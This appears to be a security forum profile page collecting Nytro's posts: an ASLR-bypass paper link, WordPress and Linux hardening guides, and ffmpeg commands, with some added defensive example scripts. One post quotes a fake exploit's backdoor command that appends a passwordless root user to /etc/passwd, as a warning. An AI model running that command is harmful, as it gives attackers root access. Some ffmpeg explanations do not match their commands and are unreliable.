Everything posted by Nytro

  1. Nytro

    Forum problem

    It's caused by the forum itself; I don't know what can be done about it, and I hope the encoding of the database tables won't have to be changed. kwe said he'll take care of it when he has time; I'll keep nagging him.
  2. "Professional" hosting: F:\xampp\htdocs...
  3. Bypassing Windows 7 Kernel ASLR
    Authored by Stefan Le Berre

    Whitepaper called Bypassing Windows 7 Kernel ASLR. In this paper, the author explains every step to code an exploit with a useful kernel ASLR bypass. Successful exploitation is performed on Windows 7 SP0 / SP1.

    Download: http://dl.packetstormsecurity.net/papers/bypass/NES-BypassWin7KernelAslr.pdf
  4. I think it's fake, at least that's what some people who analyzed it say. It creates a root account without a password.
  5. That "evil" hex ends with: "/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD"

    It sends the data wherever you tell it to:
      send(s, buffer, strlen(buffer), 0)

    This is executed locally...
      execl("/bin/sh", "sh", "-c", evil, 0);

    So I think it's fake, a backdoor, so don't run it (at least NOT as root). Or remove:
      if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL);

    Although this may be needed for the shell. I don't know what the first instructions do; if I have time and manage to disassemble the data from the hex, maybe I'll figure out whether it infects or not. For now I'm not sure whether it's a backdoor or not; run it as a normal user and there shouldn't be any problems.
  6. 10 Steps to Securing Your WordPress Installation
    Fouad Matin, Sep 16th 2011

    Tutorial Details
    Program: WordPress
    Version: 3.2.1
    Difficulty: Beginner
    Estimated Completion Time: 20 - 30 minutes

    WordPress is open source, which means that everyone, including hackers with malicious intent, can scour the source code looking for holes in its security. That is why I'm going to show you some good precautionary steps to take to protect you, your WordPress and, most importantly, your users.

    #1 Remove the Admin Superuser
    Probably the easiest thing you could do to protect yourself is to start off by changing/removing the admin superuser. Anyone who uses WordPress knows that there is a user called admin with top-level security clearance, especially hackers. If the username is admin, how hard can it be to crack the password? Create a new administrative account, but this time with a different name, and then delete the admin account. In fact, what I would personally recommend is to create an administrative account with a very complex username and password (something like x7duEls91*), store it somewhere, and make another account for you to publish content that has your name and does not have executive powers. The admin account is essentially only needed to manage themes, plugins and other aspects of the site that do not need to be changed on a daily basis; an editor account would be sufficient.

    “Treat your password like your toothbrush. Don't let anybody else use it, and get a new one every six months.” ~Clifford Stoll

    #2 Choose a Strong Password
    Regardless of the type of site you are running, you may be at risk of a brute-force attack. Deleting the admin username in the first step probably deterred most hackers, but there are always those that are very persistent or already know your username. The next step to take is to choose a very difficult and diverse password. A good way to determine whether or not your password is secure is to enter it into an online password checker like passwordmeter.com or to generate a random password.

    #3 Secure Your Password
    Also, I prefer to take extra precautions when protecting my blog; installing plugins can add an extra layer of security. There are numerous plugins that can handle passwords and login aspects of WordPress. One plugin that I find very useful is Login LockDown; it records the IP address and timestamp of all failed logins, in addition to IP blocking after a certain number of failed logins. This plugin is especially helpful when it comes to defending yourself against a brute force attack; most attackers give up on a site if they are IP banned every 5 minutes while running their brute force program.

    #4 Always Update WordPress
    As I said earlier, WordPress is open source, making it an easier target for hackers. Nearly 60 million sites use WordPress; when Automattic pumps out an update, the sooner you update your site the better, because when they make a new update they also post the vulnerabilities that they fixed. Also, it doesn't take long to update your WordPress installation; according to WordPress it takes 5 minutes to complete.

    #5 Hide WordPress Version
    Let's say that you forget to update your WordPress installation, or just don't have 5 minutes to spare. Your WordPress version gives hackers a good idea of how they can hack your site, especially if it's outdated. By default, WordPress displays the version, because they want it for metrics to see how many people are using which version, etc. However, this is like putting up a bright red sign on your site telling hackers what to do. If you're using a premium theme, odds are that the developer took the liberty of disabling it for you, but it's always better to be sure. Open your functions.php file and drop in this line of code:

      <?php remove_action('wp_head', 'wp_generator'); ?>

    #6 Change File Permissions
    It is very important that you have the proper file permissions to ensure your site's security. I recommend that you restrict your file permissions down to the bare CHMOD value of 744, which essentially makes it read-only to everyone except you. Just open your FTP program, right click the folder or file and click on “File Permissions”. If it is 777, you are very lucky that you haven't already been hacked. You should change the CHMOD value to 744, only giving the “owner” full access.

    #7 Whitelist
    Whitelists allow you to manage who is able to access certain parts of your website. It's like building the Great Wall of China around your admin folder, so that no one, except for you, can access the folder. We do this using the .htaccess file. Navigate to your /wp-admin/ folder, then check if there is already a .htaccess file; if there isn't one, just make one. If there is already one there, I suggest making a backup of it before doing any edits. Please make sure you are in the wp-admin folder, and not the root folder. Paste the following code into the .htaccess file:

      AuthUserFile /dev/null
      AuthGroupFile /dev/null
      AuthName "WordPress Admin Access Control"
      AuthType Basic
      <LIMIT GET>
      order deny,allow
      deny from all
      # Whitelist Your IP address
      allow from xx.xx.xx.xxx
      # Whitelist Your Office's IP address
      allow from xx.xx.xx.xxx
      # Whitelist Your IP address While You're Traveling (Delete When You Come Back Home)
      allow from xx.xx.xx.xxx
      </LIMIT>

    Replace the xx's with your IP address, which you can find out at WhatsMyIP.org. Now every time you are going to be logging in from somewhere other than the places you added into your .htaccess file, you have to add the new IP address before you can use it.

    #8 Backup
    Regardless of the level of security of your WordPress site, it is a good habit to always back up your site. There are many ways to do this. You can take advantage of cron jobs, if your hosting company provides them, by using this command:

      DBNAME=DB_NAME
      DBPASS=DB_PASSWORD
      DBUSER=DB_USER
      EMAIL="you@your_email.com"
      mysqldump --opt -u $DBUSER -p$DBPASS $DBNAME > backup.sql
      gzip backup.sql
      DATE=`date +%Y%m%d` ; mv backup.sql.gz $DBNAME-backup-$DATE.sql.gz
      echo 'BLOG BACKUP:Your Backup is attached' | mutt -a $DBNAME-backup-$DATE.sql.gz $EMAIL -s "MySQL Backup"
      rm $DBNAME-backup-$DATE.sql.gz

    Alternatively, you can use VaultPress, a service from Automattic. If you're interested in learning more about VaultPress, then I recommend checking out this tutorial. The easiest way to go is to just log into the admin panel, navigate to Tools and then click on Export. This makes your life easier, especially when you need to re-set up your WordPress.

    #9 Hide Your Plugins
    Putting a blank index file into your /wp-content/plugins/ folder will hide all of your plugins. Some of you are probably thinking, “Who cares if someone can see my plugins?”. Well, plugins can tell hackers how to hack your site, or at least whether it is hackable. As you can see, the plugins are clearly visible to anyone who navigates to the /wp-content/plugins folder. If a hacker sees no security plugins, then they immediately know that this will be an easy job. Adding a blank index.html into the plugins folder is like putting a security sign on your lawn: it doesn't matter if you actually have the security system; as long as the hacker doesn't know, he will be less inclined to try anything.

    #10 Analyze Server Logs
    The best security tool, regardless of whichever plugin/software you install, is you. In order to be confident that you are completely protected, you have to take a proactive approach to your website's security. Three times a day I check my server logs and web analytics to see if there is any unusual behavior.

    You're Set!

    Source: http://wp.tutsplus.com/tutorials/10-steps-to-securing-your-wordpress-installation/
  7. Linux Security Basics
    Published: Monday, August 31st, 2009 by Sam Kleinman

    One of the most daunting prospects of administering your own server on a public network is dealing with your server's security. While security threats in a networked world are real and it is always important to be mindful of security issues, protecting against possible attacks is often a matter of exercising basic common sense and adhering to some general best practices. This guide takes a broad overview of common security concerns and provides a number of possible solutions to common security problems. You are encouraged to consider deploying some of these measures to "harden" your server against possible attacks.

    It's important to remember that all of the solutions we present in this document are targeted at specific kinds of attacks, which themselves may be relevant only in specific configurations. Security solutions need to be tailored to the kind of services that you're providing and the software you're running, and the decision whether or not to deploy a specific security solution is often a matter of personal discretion and cost-benefit analysis. Perhaps most importantly, it should be understood that security is a process, not a product (credit to Bruce Schneier). There is no "magic bullet" set of guidelines that can be followed to ensure the security of any system. Threats are constantly evolving, so vigilance is required on the part of network administrators to prevent unauthorized access to systems.

    Contents
    - Keep Systems and Software Up To Date
    - Disable Unused Services
    - Lock Down SSH
    - Limit Root and System Users' Access
    - Use a Firewall to Block Unwanted Traffic
    - Use Denyhosts or Fail2Ban to Prevent Password Attacks
    - Encrypt Sensitive Data
    - Best Practices with Databases

    Keep Systems and Software Up To Date
    One of the most significant sources of security vulnerabilities is systems running out-of-date software with known security holes. Make a point of using your system's package management tools to keep your software up to date; this will greatly assist in avoiding easily preventable security intrusions. Running system updates with the package management tool, using "apt-get update && apt-get upgrade" (for Debian and Ubuntu systems) or "yum update" (for CentOS and Fedora systems), is simple and straightforward. This practice ensures that if your distribution maintains active security updates, your system will be guarded against many security holes in commonly used software packages.

    System update tools will, however, not keep software up to date that you've installed outside of package management. This includes software that you've compiled and installed "by hand" (e.g. with "./configure && make && make install") and web-based applications that you've installed from a software developer's site, as is often the case with applications like WordPress and Drupal. Also excluded from protection will be libraries and packages you've installed with supplementary package management tools like Ruby's Gems, Perl's CPAN tool, Python easy_install, and Haskell Cabal. You will have to manage the process of keeping these files up to date yourself.

    The method you use to make sure that your entire system is kept up to date is a matter of personal preference, and depends on the nature of your workflow. We would recommend trying very hard to use the versions of software provided by your operating system or other programming platform-specific package management tools. If you must install from "source," we would recommend that you save the tarballs and source files for all such software in /src/ or ~/src/ so that you can keep track of what software you've installed in this manner. Often, you can remove a manually compiled application by issuing "make uninstall" in the source repository (directory). Additionally, it may be helpful to maintain a list of manually installed software, with version numbers and download locations. You may also want to investigate packaging your own software so that you can install it with apt, yum or pacman.

    Because of the complexity of maintaining software outside of the system's package management tools, we strongly recommend avoiding manually installing software unless absolutely necessary. Your choice of a Linux distribution should be heavily biased by the availability of software in that distro's repositories for the systems you need to run on your server.

    Disable Unused Services
    One common avenue for attack involves exploiting unused applications. In general, we recommend disabling daemons (services) that you're not actively using, developing, or testing. Using "/etc/init.d/[service] stop" or "/etc/rc.d/[service] stop", depending on your distribution, to deactivate unused services can prevent these services from being exploited later. Please note that services that are configured to start at system boot will run again should you reboot your server, so it may be safer to disable them from automatically starting using your distribution's particular method for doing so. Not only will unused services no longer consume system resources, but if there are any security vulnerabilities in these services, would-be attackers will be unable to exploit them. Any service that you're not using should be turned off. To see what processes you're currently running, we recommend using the htop tool. Install it with "apt-get install htop", "yum install htop" or "pacman -Sy htop".

    Lock Down SSH
    SSH, the secure shell service, is the main avenue we use to interact with servers remotely. While SSH provides exceptional encryption and security for users, it also provides a great deal of access to your server and thus represents an appealing target for an attacker. To counteract the possibility of having your servers compromised with an SSH attack, we recommend taking the following steps.

    First, disable root logins via SSH. Since the root username is predictable and provides complete access to your system, providing unfettered access to this account over SSH is unwise. Edit the /etc/ssh/sshd_config file to modify the PermitRootLogin option as follows:

      PermitRootLogin no

    If you need to gain root access to your system you can (and should) use tools like su and sudo to do so without logging in as root.

    Second, disable password authentication. Generate and use SSH keys to log into your system. Without passwords enabled, attackers will need to guess (or steal) your SSH private key in order to gain access to your server. In the file "/etc/ssh/sshd_config", modify PasswordAuthentication as follows:

      PasswordAuthentication no

    If you do not have SSH keys generated, you will have to generate them on your own machine before disabling password authentication. To generate SSH keys for your host, issue the following command on your local system if you're using Mac OS X or Linux locally:

      ssh-keygen

    Answer the program's inquiries; generally the defaults are acceptable. This will generate an SSH key using the RSA algorithm. If you want to use the DSA algorithm, append "-t dsa" to the command. Your SSH key will be generated with the private key in ~/.ssh/id_rsa and the public key in ~/.ssh/id_rsa.pub. You will want to copy the public key into the ~/.ssh/authorized_keys file on the remote machine, using the following commands (replacing your own SSH user and host names):

      scp ~/.ssh/id_rsa.pub user@hostname.com:/home/user/.ssh/uploaded_key.pub
      ssh user@hostname.com "cat ~/.ssh/uploaded_key.pub >> ~/.ssh/authorized_keys"

    If you're using PuTTY in Windows, note that it has the ability to generate keys using puttygen that you can upload to your server. You can download puttygen from the PuTTY Homepage.

    If you have a problem logging in, you will need physical access or out-of-band console access to your server to restore SSH functionality. You can use the Linode shell (LISH) to access your server's console.

    Limit Root and System Users' Access
    In general, users and applications that do not have access to a system on your server, either by virtue of limited access rules or by limited abilities to log into the system, cannot do any harm to the system. Additionally, one common way of compromising a system is to trick the system into thinking that a user has access rights greater than what they actually have. While these "escalation attacks" are relatively uncommon and are often patched rather quickly, they are only a threat when there are accounts that can be exploited. To address these possible threats we suggest the following best practices with regard to managing your user accounts:

    - Don't give people user accounts if they don't need them. There are often ways to provide access to specific servers without giving users accounts with even limited access to the system. Giving someone a shell account on your system should be seen as a last resort in most cases.
    - If you need to have multiple administrators for a system, rather than share a single root password among many people, use sudo to give "root access" but force users to authenticate with their own password. The sudo command also provides more detailed logging, so you know which root commands were issued by which user.
    - Leverage user groups and permissions to provide granular access control when you have no option but to give a user an account on your system.
    - Disable unused system user accounts, either by removing the account outright with the userdel command, or by locking the user account with "usermod --lock LOGIN-NAME" until the user needs access again (achieved with "usermod --unlock").

    Limiting access to your servers and adhering to best practices with regard to administrative access and user account management won't guard against escalation attacks or all possible intrusions. However, by limiting the size of your "shadow" you decrease the likelihood of becoming the victim of many kinds of attacks.

    Use a Firewall to Block Unwanted Traffic
    As the term "firewall" has fallen into common non-technical usage, the specific role of a firewall solution as part of a larger security plan has become somewhat unclear. Firewalls are simple traffic filters that can be used to limit and constrain inbound traffic to your Linode. The aim is to prevent all traffic arriving from certain IP addresses or over certain ports in situations where you know that traffic is unwanted or malicious. On the whole, firewall settings and configurations are beyond the scope of this document. We recommend that you review specific guides for firewall configuration to learn how to configure your firewall correctly for your use. In this section, we hope to explain some basic firewall settings that you can use to prevent most intrusions.

    Although there are numerous packages on Linux systems that enable efficient and effective configuration of firewalls, the actual firewalls are created using iptables. This uses the packet filtering capabilities of the Linux kernel itself, which means that the firewall rules are enforced very efficiently. Nevertheless, the firewall that you configure can be as open or as restrictive as you need.

    It's sometimes difficult to decide what the best strategy is for deploying an effective firewall. With the understanding that your firewall setup must take the actual uses of your server and its users into account, we offer the following list as potential strategies for deploying a firewall.

    - Identify the services that you're using and close all ports on all public IP addresses, except the ones that the services you use listen on. The most common standard ports include: web servers on port 80, ssh on port 22, smtp on port 25. If there are any security vulnerabilities for software running on other ports or intruders are scanning for open ports, the firewall will reject this traffic before it can invade your system. Disadvantages: This filter can be confusing if your suite of services changes regularly, and you may end up unintentionally locking yourself out of services that you want to use, which can be hard to troubleshoot.
    - Watch access logs for suspicious behavior and block inbound traffic from IPs and IP ranges that are attacking your server. If you're getting malicious activity from a specific IP address, then it's probably safe to block all traffic from that IP, at least for a while. Disadvantages: People can change their IP addresses to get around these rules, and blocking individual addresses from accessing your server can't prevent attacks before they happen.
    - Block inbound traffic on sensitive ports, except from IP addresses that you know are good. Some services, like SSH, can grant an attacker a great deal of access to the system, while HTTP servers like Apache are designed to be accessed by the public at large. This is a "whitelisting" strategy and can be used to effectively secure services like SSH and database servers that are accessed over a private network. If you know where "good" traffic is likely to originate from, you can prevent would-be attackers from gaining access to your machines without hindering the good traffic. Disadvantages: This strategy is only effective if you have a limited number of "good" sources of traffic, and is ineffective at securing services that need to be publicly accessible.

    These rules can -- and perhaps should -- be deployed to varying degrees as part of a larger security strategy. Firewalls alone don't prevent malicious behavior and are not a security cure-all, but they can be quite effective at preventing some attacks. When deciding to deploy firewall rules, the decision often comes down to the following questions: "will this rule impede traffic that I actually want to serve?", "will this rule make it more difficult to use the server as I want to?", and finally "will this rule successfully block traffic that I don't want to serve?" The answers to these questions often vary in response to the services you're providing and the way you use your server, but we hope that the above guidelines provide a productive starting point for your firewall deployment.

    Use Denyhosts or Fail2Ban to Prevent Password Attacks
    The DenyHosts and Fail2Ban applications (for which packages should be included in your distribution's software repository) help prevent dictionary attacks on your server. The basic concept is simple: these programs watch for attempted logins, and if your server is receiving multiple failed login attempts from the same IP address, these applications will insert firewall rules that will block traffic from the attacker's IP address. The assumption is that "good" users are very likely to be able to get their password correct in less than 3-5 attempts, and that anyone who submits an incorrect password more than 3-5 times is trying to break into a system. While there is the potential for false positives, the "bans" can be temporary, and are easily reversed by the administrator if necessary. The number of allowed attempts and the length of time the resulting ban remains in effect are configurable by the system administrator. Attempted logins can be monitored on a variety of protocols, including HTTP Auth, SMTP, and SSH. While this approach to restricting traffic won't prevent a compromised password from being used to break into a system, it can reduce the risk that a system user's weak password poses to the server as a whole.

    Encrypt Sensitive Data
    If most "best security practices" come down to exercising a fair bit of paranoia over your data and systems, then implementing data encryption represents the most severe expression of this paranoia. Well tuned access control lists are often quite effective at preventing most casual abuse, and there is always some resource overhead for encrypting and decrypting data. Nevertheless, if you're storing truly sensitive data, it's often quite prudent to encrypt it. There are a number of different options for accomplishing this goal.

    First, encrypt individual files using PGP and the tools provided by the GNU Privacy Guard package in your distribution (frequently, as "gpg"). PGP is very secure, and if you already use PGP keys and have a small number of sensitive files, this can be quite workable. This prevents casual snoopers from reading the contents of a file, even if they have read access to it, though it only works on a file-by-file basis. Additionally, it can sometimes be confusing to make sure you're encrypting data with the proper public key.

    The second option is more advanced. It requires running your own kernel under PV-GRUB, and using the dm-crypt kernel module to encrypt the contents of the disks. This takes a toll on disk performance, and requires you to enter a password on boot in order to access your files. The disadvantages are plenty: you are responsible for maintaining an up-to-date kernel, and if you lose your password all your files will be unrecoverable. Additionally, disk-level encryption protects against a very narrow set of threats: against physical attacks against the hardware and against unforeseen (and unlikely) issues with the virtualization engine in use. Once a machine with disk-level encryption is booted and running -- aside from the slight performance hit -- it is indistinguishable from an unencrypted system in terms of user experience.

    The final option, and perhaps the best middle ground, is to use a system like "EncFS" which creates an encrypted filesystem in user-space (using the FUSE interface). This system writes your files in an encrypted format to the disk, and when you mount the filesystem you're provided with a usable and unencrypted view of it. When you unmount the file system, you only have encrypted files. EncFS doesn't protect meta-data information like file size, permissions, and last-edited time, but is otherwise very secure. For sensitive files, this prevents the additional complexity of managing individual encrypted files, while still allowing for high quality data security.

    Again, from a holistic perspective, encrypting in this manner provides minimal benefit for most use cases and comes with a great deal of overhead. Nevertheless, there are some situations where encryption makes a lot of sense, particularly when you're managing very sensitive data on networked machines. Consider encryption as a possible tool among many options for creating a more secure environment.

    Best Practices with Databases
    One common class of security issues involves the applications that you develop and run on your server, as opposed to all of the system software that your application depends upon. There are some basic guidelines that you may want to follow as you develop applications.

    - Distrust all inputs by sanitizing all text and content that users could put into the system. Most programming languages have "string scrubber" tools that you can use to strip out all code, scripts, and unwanted HTML tags. Use these to prevent anyone from using your site to publish malicious code, or using code to exploit your server. If your application is written in Perl, consider enabling warnings and "taint mode" by starting your program with "#!/usr/bin/perl -tw". Taint mode requires all input from external sources to be tested with a regular expression before it may be used in your program. This means you won't accidentally use an untrusted input without (hopefully) running a sane regular expression check on it to make sure it contains only valid data.
    - If your application is written in PHP, consider using the mysql_real_escape_string and htmlentities functions to sanitize user input such as GET and POST data. Using the above "string scrubbers" is a great way to begin securing your PHP code. You can find more information and examples on the mysql_real_escape_string and htmlentities manual pages.
    - Sanitize database inputs to prevent SQL injection attacks when using a database system. One typical approach involves using prepared statements with the database interface. This prevents your database from generating unexpected output, and makes it impossible for users to perform unintended modifications to your database or to access unauthorized content from your system.
    - Authenticate all requests for secure information, rather than passing or storing IsAuthenticated or IsPrivileged status to the user. In short, avoid storing any information in cookies or in the HTTP query string that you don't want the users to be able to edit.

    These tips for coding practices, and indeed all of the security tips that we present here, are simply a starting place for ensuring that your system remains protected against intrusions from malicious users. Nevertheless, from our experience even these small suggestions will help keep your system secure from many common exploits. We hope that this guide has presented a number of manageable approaches that you can deploy in order to help ensure that your system remains secure.

    Source: Linux Security Basics
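An added check for the "Lock Down SSH" section of the guide above (example code written for this page, not from the guide or from OpenSSH): it reads an sshd_config the way sshd resolves these two directives and reports whether each matches the recommended value. The sample configs are constructed, and treating a missing keyword as "yes" is an assumption.

```python
"""Audit an sshd_config for PermitRootLogin and PasswordAuthentication."""
import re

# Directives the guide asks you to set, with the wanted value.
WANTED = {"permitrootlogin": "no", "passwordauthentication": "no"}
# Assumption: value applied when the keyword is absent from the file.
ASSUMED_DEFAULT = "yes"


def parse_global(config_text):
    """Return {keyword_lower: value} for the global section of an sshd_config.

    Rules applied: keywords are case-insensitive; the first occurrence of a
    keyword wins; lines starting with '#' are comments; 'keyword value' and
    'keyword=value' are both accepted; everything after a 'Match' line only
    applies when the match criteria hold, so it is excluded from the global view.
    """
    found = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break  # conditional section begins; stop the global scan
        if len(parts) == 2 and key not in found:
            found[key] = parts[1].strip()
    return found


def audit(config_text):
    """Return [(keyword, effective_value, ok)] for each hardening directive."""
    values = parse_global(config_text)
    report = []
    for key, wanted in WANTED.items():
        effective = values.get(key, ASSUMED_DEFAULT)
        report.append((key, effective, effective.lower() == wanted))
    return report


# Constructed sample: the root-login line is commented out, a common slip that
# leaves the default in force even though the directive "looks" set.
LAX = """\
Port 22
#PermitRootLogin no
PasswordAuthentication yes
"""

# Constructed sample: passwords are re-enabled only inside a Match block, so
# the global audit must still report "no".
HARDENED = """\
PermitRootLogin no
PasswordAuthentication no
Match Address 10.0.0.0/8
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for name, text in (("lax", LAX), ("hardened", HARDENED)):
        for key, value, ok in audit(text):
            print(f"{name}: {key}={value} {'OK' if ok else 'FIX'}")
```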
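An added example for the Denyhosts/Fail2Ban section of the guide (written for this page, not code from either project): the detection logic the text describes, run over a few constructed sshd log lines. The threshold of 5 failures within 10 minutes, the one-hour ban and the year 2009 for the yearless syslog timestamps are assumed values.

```python
"""Fail2Ban-style detection of repeated failed SSH logins per source IP."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample auth log: one host fails five times quickly, a legitimate
# user mistypes once and then logs in with a key, and the first host returns later.
SAMPLE_LOG = """\
Aug 31 10:00:01 web sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Aug 31 10:00:04 web sshd[2103]: Failed password for root from 203.0.113.5 port 51240 ssh2
Aug 31 10:00:07 web sshd[2105]: Failed password for root from 203.0.113.5 port 51241 ssh2
Aug 31 10:00:09 web sshd[2107]: Failed password for invalid user test from 203.0.113.5 port 51250 ssh2
Aug 31 10:00:12 web sshd[2109]: Failed password for invalid user oracle from 203.0.113.5 port 51255 ssh2
Aug 31 10:00:30 web sshd[2111]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Aug 31 10:00:35 web sshd[2111]: Accepted publickey for alice from 198.51.100.7 port 40001 ssh2
Aug 31 10:20:00 web sshd[2200]: Failed password for root from 203.0.113.5 port 51300 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+) port"
)


def parse_ts(text, year=2009):
    # Syslog timestamps carry no year; the year is an assumption for the sample.
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def find_offenders(log_text, max_attempts=5, window=timedelta(minutes=10),
                   ban=timedelta(hours=1)):
    """Return {ip: ban_expiry} for IPs with >= max_attempts failures inside window.

    Keeps a sliding window of recent failure times per source IP. When the
    window fills, the IP is banned for `ban` and its window is cleared so one
    burst produces one ban. Successful logins never count against an IP, and
    failures from an IP that is already banned are ignored (the firewall rule
    would have dropped them anyway).
    """
    recent = defaultdict(deque)
    bans = {}
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts, ip = parse_ts(m["ts"]), m["ip"]
        if ip in bans and ts < bans[ip]:
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= max_attempts:
            bans[ip] = ts + ban
            q.clear()
    return bans


def iptables_rules(bans):
    """Render the kind of firewall rule the text says these tools insert."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(bans)]


if __name__ == "__main__":
    result = find_offenders(SAMPLE_LOG)
    for ip, expiry in result.items():
        print(f"ban {ip} until {expiry:%H:%M:%S}")
    print("\n".join(iptables_rules(result)))
```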
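An added example for the "Best Practices with Databases" section (written for this page, not from the guide): the string-built query beside its prepared-statement form, using Python's sqlite3 in place of the PHP/MySQL functions the text names, with html.escape standing in for htmlentities. The user table and its rows are constructed.

```python
"""Prepared statements versus string-built SQL, plus output escaping."""
import html
import sqlite3


def make_db():
    """Constructed in-memory table with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "alice@example.com", 1),
        ("bob", "bob@example.com", 0),
    ])
    return conn


def find_user_unsafe(conn, name):
    # The query text is assembled from untrusted input, so a quote in the
    # input ends the literal and the rest of the input is parsed as SQL.
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    # Prepared statement: the SQL text is fixed and the value is bound
    # separately by the driver, so the input can only ever be compared as data.
    sql = "SELECT name, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def render_greeting(name):
    # htmlentities() counterpart: escape before placing user data into HTML so
    # tags or script in the name are shown as text, not interpreted.
    return "<p>Hello, " + html.escape(name) + "</p>"


if __name__ == "__main__":
    conn = make_db()
    # A name containing a quote: harmless to the prepared statement, but it
    # changes the meaning of the string-built query.
    tricky = "nobody' OR '1'='1"
    print(find_user_unsafe(conn, tricky))  # returns every row
    print(find_user_safe(conn, tricky))    # [] : no user has that literal name
    print(render_greeting("<b>alice</b>"))
```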
  8. TUS - The Untraceable Surfer
    We provide a platform for truly anonymous, safe and unrestricted web surfing. The internet is a public network where eavesdropping is made very easy. Also, internet service providers, workplaces and governments may restrict and monitor internet usage. By surfing the internet on our terminal servers all these privacy concerns and restrictions are gone.

    Download: https://www.tusurfer.com/tus/download.do

    Dear User,
    On behalf of the TUS team I welcome you to our website. The TUS website allows and enables citizens of any country to freely and safely access any information on the internet. And the reason this website was created? The idea was born while I was living in a communist country. Although I later moved to Canada (one of the best countries in the world), I have not forgotten my roots. Please enjoy our services and help us make them better by giving us your invaluable feedback. Also, if you have any suggestions, concerns or questions we would love to hear from you.
    Kindest regards,
    Nigel Fox

    Info: https://www.tusurfer.com/tus/index.jsp
9. 19 ffmpeg commands for all needs

ffmpeg is a multiplatform, open-source library for video and audio files. I have compiled 19 useful and amazing commands covering almost all needs: video conversion, sound extraction, encoding files for iPod or PSP, and more.

Getting info from a video file

    ffmpeg -i video.avi

Turn X images into a video sequence

    ffmpeg -f image2 -i image%d.jpg video.mpg

This command will transform all the images from the current directory (named image1.jpg, image2.jpg, etc.) into a video file named video.mpg.

Turn a video into X images

    ffmpeg -i video.mpg image%d.jpg

This command will generate the files named image1.jpg, image2.jpg, ... The following image formats are also available: PGM, PPM, PAM, PGMYUV, JPEG, GIF, PNG, TIFF, SGI.

Encode a video sequence for the iPod/iPhone

    ffmpeg -i source_video.avi -acodec aac -ab 128kb -vcodec mpeg4 -b 1200kb -mbd 2 -flags +4mv+trell -aic 2 -cmp 2 -subcmp 2 -s 320x180 -title X final_video.mp4

Explanations:
  Source: source_video.avi
  Audio codec: aac
  Audio bitrate: 128kb/s
  Video codec: mpeg4
  Video bitrate: 1200kb/s
  Video size: 320px by 180px
  Generated video: final_video.mp4

Encode video for the PSP

    ffmpeg -i source_video.avi -b 300 -s 320x240 -vcodec xvid -ab 32 -ar 24000 -acodec aac final_video.mp4

Explanations:
  Source: source_video.avi
  Audio codec: aac
  Audio bitrate: 32kb/s
  Video codec: xvid
  Video bitrate: 1200kb/s
  Video size: 320px by 180px
  Generated video: final_video.mp4

Extracting sound from a video, and saving it as MP3

    ffmpeg -i source_video.avi -vn -ar 44100 -ac 2 -ab 192 -f mp3 sound.mp3

Explanations:
  Source video: source_video.avi
  Audio bitrate: 192kb/s
  Output format: mp3
  Generated sound: sound.mp3

Convert a wav file to MP3

    ffmpeg -i son_origine.avi -vn -ar 44100 -ac 2 -ab 192 -f mp3 son_final.mp3

Convert .avi video to .mpg

    ffmpeg -i video_origine.avi video_finale.mpg

Convert .mpg to .avi

    ffmpeg -i video_origine.mpg video_finale.avi

Convert .avi to animated gif (uncompressed)

    ffmpeg -i video_origine.avi gif_anime.gif

Mix a video with a sound file

    ffmpeg -i son.wav -i video_origine.avi video_finale.mpg

Convert .avi to .flv

    ffmpeg -i video_origine.avi -ab 56 -ar 44100 -b 200 -r 15 -s 320x240 -f flv video_finale.flv

Convert .avi to dv

    ffmpeg -i video_origine.avi -s pal -r pal -aspect 4:3 -ar 48000 -ac 2 video_finale.dv

Or:

    ffmpeg -i video_origine.avi -target pal-dv video_finale.dv

Convert .avi to mpeg for dvd players

    ffmpeg -i source_video.avi -target pal-dvd -ps 2000000000 -aspect 16:9 finale_video.mpeg

Explanations:
  target pal-dvd: output format
  ps 2000000000: maximum size for the output file, in bits (here, 2 Gb)
  aspect 16:9: widescreen

Compress .avi to divx

    ffmpeg -i video_origine.avi -s 320x240 -vcodec msmpeg4v2 video_finale.avi

Compress Ogg Theora to Mpeg dvd

    ffmpeg -i film_sortie_cinelerra.ogm -s 720x576 -vcodec mpeg2video -acodec mp3 film_terminée.mpg

Compress .avi to SVCD mpeg2

NTSC format:

    ffmpeg -i video_origine.avi -target ntsc-svcd video_finale.mpg

PAL format:

    ffmpeg -i video_origine.avi -target pal-svcd video_finale.mpg

Compress .avi to VCD mpeg2

NTSC format:

    ffmpeg -i video_origine.avi -target ntsc-vcd video_finale.mpg

PAL format:

    ffmpeg -i video_origine.avi -target pal-vcd video_finale.mpg

Multi-pass encoding with ffmpeg

    ffmpeg -i fichierentree -pass 2 -passlogfile ffmpeg2pass fichiersortie-2

This article is an English adaptation of Jean Cartier's ffmpeg examples.

Source: http://www.catswhocode.com/blog/19-ffmpeg-commands-for-all-needs
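All of the commands above take file names straight from the user. One detail worth handling when they are wrapped in a script is that ffmpeg reads any argument starting with "-" as an option, so a file literally named "-i.avi" is not treated as a file. The wrapper below, an added example and not part of the original article, guards the "extracting sound from a video" command with a small path normaliser; the function names and the `./` prefixing convention are my own choices, the ffmpeg flags are the article's.

```shell
#!/bin/sh
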